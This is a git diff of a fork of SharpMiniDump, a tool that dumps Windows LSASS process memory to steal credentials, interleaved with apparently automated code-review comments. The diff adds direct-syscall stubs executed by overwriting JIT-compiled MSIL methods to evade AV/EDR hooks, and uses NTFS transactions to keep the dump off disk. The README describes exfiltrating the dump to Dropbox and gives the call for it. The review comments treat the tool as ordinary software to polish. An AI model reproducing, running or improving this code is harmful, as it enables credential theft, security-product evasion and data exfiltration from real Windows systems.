diff --git a/README.md b/README.md index bbcae26..d3628c9 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,12 @@ # SharpMiniDump -Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses: dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection. +Implementation of b4rtiks's [SharpMiniDump](https://github.com/b4rtik/SharpMiniDump) using NTFS transactions to avoid writting the minidump to disk and exfiltrating it via HTTPS using sockets. As a POC, dropbox is used to exfiltrate the data but this can me easily modified. -SharpMiniDump is a rough port of this project [Dumpert](https://github.com/outflanknl/Dumpert) by [@Cn33liz](https://twitter.com/Cneelis) and you will find the detail in this [post](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/), so BIG credits to him. +If you wish to use dropbox, just change the following parameters at Program.cs:201 and you are good to go. -Other credits go to [@cobbr_io](https://twitter.com/cobbr_io) and [@TheRealWover](https://twitter.com/TheRealWover) for their work on [SharpSploit](https://github.com/cobbr/SharpSploit) (Execution / DynamicInvoke) +```C# +SslTcpClient.RunClient("content.dropboxapi.com", "", "", b64); +``` diff --git a/SharpMiniDump/CustomLoadLibrary.cs b/SharpMiniDump/CustomLoadLibrary.cs index 374accb..687fb70 100644 --- a/SharpMiniDump/CustomLoadLibrary.cs +++ b/SharpMiniDump/CustomLoadLibrary.cs 
@@ -1,28 +1,12 @@ -// -// Author: B4rtik (@b4rtik) -// Project: RedPeanut (https://github.com/b4rtik/RedPeanut) -// License: BSD 3-Clause -// - -using System; -using System.Collections.Generic; +using System; using System.Diagnostics; using System.IO; -using System.Linq; using System.Runtime.InteropServices; -using System.Security.Cryptography; -using System.Text; namespace SharpMiniDump { public class CustomLoadLibrary - { - /// - /// Resolves LdrLoadDll and uses that function to load a DLL from disk. - /// - /// Ruben Boonen (@FuzzySec) - /// The path to the DLL on disk. Uses the LoadLibrary convention. - /// IntPtr base address of the loaded module or IntPtr.Zero if the module was not loaded successfully. + { public static IntPtr LoadModuleFromDisk(string DLLPath) { Natives.UNICODE_STRING uModuleName = new Natives.UNICODE_STRING(); 
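Review bot: The file header naming the original author and the BSD 3-Clause license is deleted at the top of this hunk, and the same deletion appears at the head of the NativeSysCall.cs and Natives.cs hunks; BSD 3-Clause requires the copyright notice to be retained in source redistributions, and the README in this same commit still presents the project as an implementation of b4rtik's SharpMiniDump, so the `// Author: B4rtik (@b4rtik)` … `// License: BSD 3-Clause` block should stay (or move to a LICENSE/NOTICE file) rather than be removed. The `///` summary, author, param and returns comments on `LoadModuleFromDisk` are also dropped here, and the following two hunks drop them on `GetLoadedModuleAddress` and `GetExportAddress`, leaving every remaining public method of `CustomLoadLibrary` undocumented; if the aim was only to remove the unused `GetLibraryAddress` helper, the doc comments on the methods that survive should be kept. The `CustomLoadLibrary` class and the `LoadModuleFromDisk` body both continue outside this hunk.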
@@ -56,40 +40,7 @@ public static IntPtr GetDllAddress(string DLLName, bool CanLoadFromDisk = false) return hModule; } - - /// - /// Helper for getting the pointer to a function from a DLL loaded by the process. - /// - /// Ruben Boonen (@FuzzySec) - /// The name of the DLL (e.g. "ntdll.dll" or "C:\Windows\System32\ntdll.dll"). - /// Name of the exported procedure. - /// Optional, indicates if the function can try to load the DLL from disk if it is not found in the loaded module list. - /// IntPtr for the desired function. - public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) - { - IntPtr hModule = GetLoadedModuleAddress(DLLName); - if (hModule == IntPtr.Zero && CanLoadFromDisk) - { - hModule = LoadModuleFromDisk(DLLName); - if (hModule == IntPtr.Zero) - { - throw new FileNotFoundException(DLLName + ", unable to find the specified file."); - } - } - else if (hModule == IntPtr.Zero) - { - throw new DllNotFoundException(DLLName + ", Dll was not found."); - } - - return GetExportAddress(hModule, FunctionName); - } - - /// - /// Helper for getting the base address of a module loaded by the current process. This base address could be passed to GetProcAddress/LdrGetProcedureAddress or it could be used for manual export parsing. - /// - /// Ruben Boonen (@FuzzySec) - /// The name of the DLL (e.g. "ntdll.dll"). - /// IntPtr base address of the loaded module or IntPtr.Zero if the module is not found. + public static IntPtr GetLoadedModuleAddress(string DLLName) { ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 
@@ -103,13 +54,7 @@ public static IntPtr GetLoadedModuleAddress(string DLLName) return IntPtr.Zero; } - /// - /// Given a module base address, resolve the address of a function by manually walking the module export table. - /// - /// Ruben Boonen (@FuzzySec) - /// A pointer to the base address where the module is loaded in the current process. - /// The name of the export to search for (e.g. "NtAlertResumeThread"). - /// IntPtr for the desired function. + public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) { IntPtr FunctionPtr = IntPtr.Zero; diff --git a/SharpMiniDump/Msil.cs b/SharpMiniDump/Msil.cs new file mode 100644 index 0000000..d7905e5 --- /dev/null +++ b/SharpMiniDump/Msil.cs 
@@ -0,0 +1,191 @@ +using System; +using System.Runtime.InteropServices; +using System.Reflection.Emit; +using System.Reflection; +using System.Security; + +namespace SharpMiniDump +{ + class msil + { + public unsafe static IntPtr getAdrressWithMSIL(byte[] syscall) + { + //begin memcopy en msil + AppDomain appD = AppDomain.CurrentDomain; + AssemblyName assName = new AssemblyName("MethodSmasher"); + AssemblyBuilder assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); + AllowPartiallyTrustedCallersAttribute attr = new AllowPartiallyTrustedCallersAttribute(); + ConstructorInfo csInfo = attr.GetType().GetConstructors()[0]; + object[] obArray = new object[0]; + CustomAttributeBuilder cAttrB = new CustomAttributeBuilder(csInfo, obArray); + assBuilder.SetCustomAttribute(cAttrB); + ModuleBuilder mBuilder = assBuilder.DefineDynamicModule("MethodSmasher"); + UnverifiableCodeAttribute codAttr = new UnverifiableCodeAttribute(); + csInfo = codAttr.GetType().GetConstructors()[0]; + CustomAttributeBuilder modCAttrB = new CustomAttributeBuilder(csInfo, obArray); + mBuilder.SetCustomAttribute(modCAttrB); + TypeBuilder tBuilder = mBuilder.DefineType("MethodSmasher", TypeAttributes.Public); + Type[] allParams = { typeof(IntPtr), typeof(IntPtr), typeof(Int32) }; + MethodBuilder methodBuilder = tBuilder.DefineMethod("OverwriteMethod", MethodAttributes.Public | MethodAttributes.Static, null, allParams); + ILGenerator generator = methodBuilder.GetILGenerator(); + + generator.Emit(OpCodes.Ldarg_0); + generator.Emit(OpCodes.Ldarg_1); + generator.Emit(OpCodes.Ldarg_2); + generator.Emit(OpCodes.Volatile); + generator.Emit(OpCodes.Cpblk); + generator.Emit(OpCodes.Ret); + + var smasherType = tBuilder.CreateType(); + var overWriteMethod = smasherType.GetMethod("OverwriteMethod"); + //end memcopy en msil + + //begin xor dummy method + appD = AppDomain.CurrentDomain; + assName = new AssemblyName("SmashMe"); + assBuilder = appD.DefineDynamicAssembly(assName, 
AssemblyBuilderAccess.Run); + attr = new AllowPartiallyTrustedCallersAttribute(); + csInfo = attr.GetType().GetConstructors()[0]; + obArray = new object[0]; + cAttrB = new CustomAttributeBuilder(csInfo, obArray); + assBuilder.SetCustomAttribute(cAttrB); + mBuilder = assBuilder.DefineDynamicModule("SmashMe"); + codAttr = new UnverifiableCodeAttribute(); + csInfo = codAttr.GetType().GetConstructors()[0]; + modCAttrB = new CustomAttributeBuilder(csInfo, obArray); + mBuilder.SetCustomAttribute(modCAttrB); + tBuilder = mBuilder.DefineType("SmashMe", TypeAttributes.Public); + Int32 xorK = 0x41424344; + Type[] allParams2 = { typeof(Int32) }; + methodBuilder = tBuilder.DefineMethod("OverwriteMe", MethodAttributes.Public | MethodAttributes.Static, typeof(Int32), allParams2); + generator = methodBuilder.GetILGenerator(); + generator.DeclareLocal(typeof(Int32)); + generator.Emit(OpCodes.Ldarg_0); + + for (var x = 0; x < 13000; x++) + { + generator.Emit(OpCodes.Ldc_I4, xorK); + generator.Emit(OpCodes.Xor); + generator.Emit(OpCodes.Stloc_0); + generator.Emit(OpCodes.Ldloc_0); + } + + generator.Emit(OpCodes.Ldc_I4, xorK); + generator.Emit(OpCodes.Xor); + generator.Emit(OpCodes.Ret); + + var smashmeType = tBuilder.CreateType(); + var overwriteMeMethod = smashmeType.GetMethod("OverwriteMe"); + //end xor dummy method + + //jit the xor method + for (var x = 0; x < 40; x++) + { + try + { + var i = overwriteMeMethod.Invoke(null, new object[] { 0x11112222 }); + } + catch (Exception e) + { + if (e.InnerException != null) + { + string err = e.InnerException.Message; + } + } + } + + byte[] trap; + + + if (IntPtr.Size == 4) + { + //32bits shcode + trap = new byte[] { 0x90 }; + } + else + { + //64bits shcode + trap = new byte[] { 0x90 }; + } + + byte[] finalShellcode = new byte[trap.Length + syscall.Length]; + Buffer.BlockCopy(trap, 0, finalShellcode, 0, trap.Length); + Buffer.BlockCopy(syscall, 0, finalShellcode, trap.Length, syscall.Length); + + IntPtr shellcodeAddress = 
Marshal.AllocHGlobal(finalShellcode.Length); + + Marshal.Copy(finalShellcode, 0, shellcodeAddress, finalShellcode.Length); + + IntPtr targetMethodAddress = getMethodAddress(overwriteMeMethod); + + object[] owParams = new object[] { targetMethodAddress, shellcodeAddress, finalShellcode.Length }; + try + { + overWriteMethod.Invoke(null, owParams); + } + catch (Exception e) + { + if (e.InnerException != null) + { + string err = e.InnerException.Message; + } + } + + return targetMethodAddress; + } + + public static IntPtr getMethodAddress(MethodInfo minfo) + { + + IntPtr retAd = new IntPtr(); + Type typeBuilded; + + if (minfo.GetMethodImplementationFlags() == MethodImplAttributes.InternalCall) + { + return IntPtr.Zero; + } + + try + { + typeBuilded = Type.GetType("MethodLeaker", true); + } + catch + { + AppDomain appD = AppDomain.CurrentDomain; + AssemblyName assName = new AssemblyName("MethodLeakAssembly"); + AssemblyBuilder assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); + ModuleBuilder mBuilder = assBuilder.DefineDynamicModule("MethodLeakModule"); + TypeBuilder tBuilder = mBuilder.DefineType("MethodLeaker", TypeAttributes.Public); + + MethodBuilder metBuilder; + if (IntPtr.Size == 4) + { + metBuilder = tBuilder.DefineMethod("LeakMethod", MethodAttributes.Public | MethodAttributes.Static, typeof(IntPtr), null); + + } + else + { + metBuilder = tBuilder.DefineMethod("LeakMethod", MethodAttributes.Public | MethodAttributes.Static, typeof(IntPtr), null); + } + + ILGenerator ilGen = metBuilder.GetILGenerator(); + + ilGen.Emit(OpCodes.Ldftn, minfo); + ilGen.Emit(OpCodes.Ret); + + typeBuilded = tBuilder.CreateType(); + } + MethodInfo methodInfoBuilded = typeBuilded.GetMethod("LeakMethod"); + try + { + var obj = methodInfoBuilded.Invoke(null, null); + retAd = (IntPtr)obj; + } + catch (Exception e) + { + Console.WriteLine(methodInfoBuilded.Name + " cannot return an unmanaged address."); + } + return retAd; + } + } +} 
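Review bot: Every failure path in the new `getAdrressWithMSIL` and `getMethodAddress` is swallowed: the two `catch (Exception e)` blocks in the first method only assign `e.InnerException.Message` to an unused local `err` and the method then returns `targetMethodAddress` regardless of whether the overwrite succeeded, while the `catch` in `getMethodAddress` writes to the console and returns the default `retAd` (zero), so callers get an address with no signal that anything went wrong; either let the exception propagate (`throw;` after logging) or document that `IntPtr.Zero` means failure and check it at the call site. The two `if (IntPtr.Size == 4)` branches are identical in both methods (`trap = new byte[] { 0x90 }` on both sides, and the same `DefineMethod("LeakMethod", …)` call on both sides), so the size check is dead code and should be removed or carry a comment explaining why the 32- and 64-bit cases coincide. The buffer from `Marshal.AllocHGlobal(finalShellcode.Length)` is never released after `overWriteMethod.Invoke` has consumed it; a `Marshal.FreeHGlobal(shellcodeAddress)` in a `finally` would close that leak. The `Type.GetType("MethodLeaker", true)` call inside a try/catch is exception-based control flow, and since a simple type name is not resolved against dynamic assemblies it most likely always throws and redefines `MethodLeakAssembly` on every call — worth confirming, and a comment stating the intended caching behaviour either way. Naming and modifiers also depart from the rest of the project (`class msil`, `getAdrressWithMSIL` with a typo, `public unsafe static` with no pointer code in the body); `Msil.GetAddressWithMsil` / `GetMethodAddress` and `public static` would match `CustomLoadLibrary.GetExportAddress`.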
diff --git a/SharpMiniDump/NativeSysCall.cs b/SharpMiniDump/NativeSysCall.cs index 21acce7..9ad3bcb 100644 --- a/SharpMiniDump/NativeSysCall.cs +++ b/SharpMiniDump/NativeSysCall.cs @@ -1,12 +1,4 @@ -// -// Author: B4rtik (@b4rtik) -// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump) -// License: BSD 3-Clause -// - -using System; -using System.ComponentModel; -using System.Diagnostics; +using System; using System.Runtime.InteropServices; using System.Security; using static SharpMiniDump.Natives; 
@@ -37,250 +29,95 @@ class NativeSysCall static byte[] bZwProtectVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x50, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x36 + /// 3: b8 0f 00 00 00 mov eax,0x55 /// 8: 0f 05 syscall /// a: c3 ret - static byte[] bZwQuerySystemInformation10 = { 0x49, 0x89, 0xCA, 0xB8, 0x36, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + static byte[] bNtCreateFile10 = { 0x49, 0x89, 0xCA, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; - /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x18 - /// 8: 0f 05 syscall - /// a: c3 ret + ///0: 49 89 ca mov r10,rcx + ///3: b8 26 00 00 00 mov eax,0x26 + ///8: 0f 05 syscall + ///a: c3 ret - static byte[] bNtAllocateVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + static byte[] bZwOpenProcess10 = { 0x49, 0x89, 0xCA, 0xB8, 0x26, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x1E + /// 3: b8 0f 00 00 00 mov eax,0xC6 /// 8: 0f 05 syscall /// a: c3 ret - static byte[] bNtFreeVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x1E, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + static byte[] bNtCreateTransaction10 = { 0x49, 0x89, 0xCA, 0xB8, 0xC6, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; - /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x55 - /// 8: 0f 05 syscall - /// a: c3 ret + public static NTSTATUS NtCreateTransaction10(out IntPtr tHandle, int desiredAccess, IntPtr objAttr, IntPtr Uow, IntPtr TmHandle, ulong createOptions, ulong isolationLevel, ulong isolationFlags, IntPtr Timeout, IntPtr Description) + { + byte[] syscall = bNtCreateTransaction10; - static byte[] bNtCreateFile10 = { 0x49, 0x89, 0xCA, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); - ///0: 49 89 ca mov r10,rcx - ///3: b8 26 00 00 00 mov eax,0x26 - ///8: 0f 05 syscall - ///a: c3 ret + Delegates.NtCreateTransaction myAssemblyFunction = 
(Delegates.NtCreateTransaction)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateTransaction)); - static byte[] bZwOpenProcess10 = { 0x49, 0x89, 0xCA, 0xB8, 0x26, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + return (NTSTATUS)myAssemblyFunction(out tHandle, desiredAccess, objAttr, Uow, TmHandle, createOptions, isolationLevel, isolationFlags, Timeout, Description); + } public static NTSTATUS ZwOpenProcess10(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid) { byte[] syscall = bZwOpenProcess10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwOpenProcess myAssemblyFunction = (Delegates.ZwOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwOpenProcess)); + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); + + Delegates.ZwOpenProcess myAssemblyFunction = (Delegates.ZwOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwOpenProcess)); - return (NTSTATUS)myAssemblyFunction(out hProcess, processAccess, objAttribute, ref clientid); - } - } + return (NTSTATUS)myAssemblyFunction(out hProcess, processAccess, objAttribute, ref clientid); + } public static NTSTATUS ZwClose10(IntPtr handle) { byte[] syscall = bZwClose10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect( memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwClose myAssemblyFunction = (Delegates.ZwClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwClose)); + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); + + Delegates.ZwClose myAssemblyFunction = 
(Delegates.ZwClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwClose)); - return (NTSTATUS)myAssemblyFunction(handle); - } - } + return (NTSTATUS)myAssemblyFunction(handle); + } - + public static NTSTATUS ZwWriteVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten) { byte[] syscall = bZwWriteVirtualMemory10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect( memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwWriteVirtualMemory myAssemblyFunction = (Delegates.ZwWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwWriteVirtualMemory)); + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); + + Delegates.ZwWriteVirtualMemory myAssemblyFunction = (Delegates.ZwWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwWriteVirtualMemory)); - return (NTSTATUS)myAssemblyFunction(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); - } - } + return (NTSTATUS)myAssemblyFunction(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); + } public static NTSTATUS ZwProtectVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten) { byte[] syscall = bZwProtectVirtualMemory10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwProtectVirtualMemory myAssemblyFunction = (Delegates.ZwProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwProtectVirtualMemory)); - - return (NTSTATUS)myAssemblyFunction(hProcess, ref 
lpBaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); - } - } - } - - public static NTSTATUS ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength) - { - byte[] syscall = bZwQuerySystemInformation10; - - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); - Delegates.ZwQuerySystemInformation myAssemblyFunction = (Delegates.ZwQuerySystemInformation)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwQuerySystemInformation)); + Delegates.ZwProtectVirtualMemory myAssemblyFunction = (Delegates.ZwProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwProtectVirtualMemory)); - return (NTSTATUS)myAssemblyFunction(SystemInformationClass, SystemInformation, SystemInformationLength, ref ReturnLength); - } - } - } - - public static NTSTATUS NtAllocateVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect) - { - byte[] syscall = bNtAllocateVirtualMemory10; - - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.NtAllocateVirtualMemory myAssemblyFunction = (Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtAllocateVirtualMemory)); - - return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect); - } - } + return (NTSTATUS)myAssemblyFunction(hProcess, ref lpBaseAddress, ref 
NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); + } - public static NTSTATUS NtFreeVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType) + public static NTSTATUS NtCreateFile10(out IntPtr fileHandle, Int32 desiredAccess, ref OBJECT_ATTRIBUTES objectAttributes, out IO_STATUS_BLOCK ioStatusBlock, ref Int64 allocationSize, UInt32 fileAttributes, System.IO.FileShare shareAccess, UInt32 createDisposition, UInt32 createOptions, IntPtr eaBuffer, UInt32 eaLength) { - byte[] syscall = bNtFreeVirtualMemory10; - - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.NtFreeVirtualMemory myAssemblyFunction = (Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtFreeVirtualMemory)); + byte[] syscall = bNtCreateFile10; - return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ref RegionSize, FreeType); - } - } - } + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); - public static NTSTATUS NtCreateFile10(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle, - Int32 desiredAccess, - ref OBJECT_ATTRIBUTES objectAttributes, - out IO_STATUS_BLOCK ioStatusBlock, - ref Int64 allocationSize, - UInt32 fileAttributes, - System.IO.FileShare shareAccess, - UInt32 createDisposition, - UInt32 createOptions, - IntPtr eaBuffer, - UInt32 eaLength) - { - byte[] syscall = bNtCreateFile10; + Delegates.NtCreateFile myAssemblyFunction = (Delegates.NtCreateFile)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateFile)); - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - 
Delegates.NtCreateFile myAssemblyFunction = (Delegates.NtCreateFile)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateFile)); - - return (NTSTATUS)myAssemblyFunction(out fileHandle, - desiredAccess, - ref objectAttributes, - out ioStatusBlock, - ref allocationSize, - fileAttributes, - shareAccess, - createDisposition, - createOptions, - eaBuffer, - eaLength); - } - } + return (NTSTATUS)myAssemblyFunction(out fileHandle, desiredAccess,ref objectAttributes,out ioStatusBlock,ref allocationSize, fileAttributes, shareAccess, createDisposition, createOptions, eaBuffer, eaLength); + } public struct Delegates 
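Review bot: The byte column in the new `///` listings does not match the stubs they describe: above `bNtCreateFile10` the line reads `/// 3: b8 0f 00 00 00 mov eax,0x55` while the array holds `0xB8, 0x55, 0x00, 0x00, 0x00`, and above `bNtCreateTransaction10` it reads `b8 0f 00 00 00 mov eax,0xC6` against `0xB8, 0xC6, …`; the `0f` looks carried over from an earlier stub, so the bytes in those two comments should be corrected to agree with the arrays, as the `bZwOpenProcess10` comment (`b8 26 00 00 00`) already does. These listings also use the `///` XML-documentation form on private static fields with no XML tags; plain `//` comments would be the conventional form for an annotated byte dump. The new `NtCreateFile10` signature (and the matching `Delegates.NtCreateFile` in the next hunk) returns the file handle as a raw `IntPtr` instead of the previous `SafeFileHandle`, so the handle is no longer released by `Dispose`/finalization and the caller must pair it with `ZwClose10`; a doc comment on `fileHandle` stating that ownership transfers to the caller would make that explicit.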
@@ -291,45 +128,23 @@ public struct Delegates [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwClose(IntPtr handle); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); + public delegate int NtCreateTransaction(out IntPtr tHandle, int desiredAccess, IntPtr objAttr, IntPtr Uow, IntPtr TmHandle, ulong createOptions, ulong isolationLevel, ulong isolationFlags, IntPtr Timeout, IntPtr Description); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwProtectVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect); + public delegate int ZwClose(IntPtr handle); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType); + public delegate int ZwWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int NtCreateFile(out 
Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle, - Int32 desiredAccess, - ref OBJECT_ATTRIBUTES objectAttributes, - out IO_STATUS_BLOCK ioStatusBlock, - ref Int64 allocationSize, - UInt32 fileAttributes, - System.IO.FileShare shareAccess, - UInt32 createDisposition, - UInt32 createOptions, - IntPtr eaBuffer, - UInt32 eaLength); + public delegate int ZwProtectVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool RtlEqualUnicodeString(UNICODE_STRING String1, UNICODE_STRING String2, bool CaseInSensitive); + public delegate int NtCreateFile(out IntPtr fileHandle, Int32 desiredAccess, ref OBJECT_ATTRIBUTES objectAttributes, out IO_STATUS_BLOCK ioStatusBlock, ref Int64 allocationSize, UInt32 fileAttributes, System.IO.FileShare shareAccess, UInt32 createDisposition, UInt32 createOptions, IntPtr eaBuffer, UInt32 eaLength); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 
@@ -341,33 +156,19 @@ public delegate int NtCreateFile(out Microsoft.Win32.SafeHandles.SafeFileHandle [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); - - + public delegate bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); + [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] public delegate bool OpenProcessToken(IntPtr hProcess, UInt32 dwDesiredAccess, out IntPtr hToken); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int LdrLoadDll(IntPtr PathToFile, - UInt32 dwFlags, - ref Natives.UNICODE_STRING ModuleFileName, - ref IntPtr ModuleHandle); - - + public delegate int LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Natives.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle); + [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] public delegate int NtFilterToken(IntPtr TokenHandle, uint Flags, IntPtr SidsToDisable, IntPtr PrivilegesToDelete, IntPtr RestrictedSids, ref 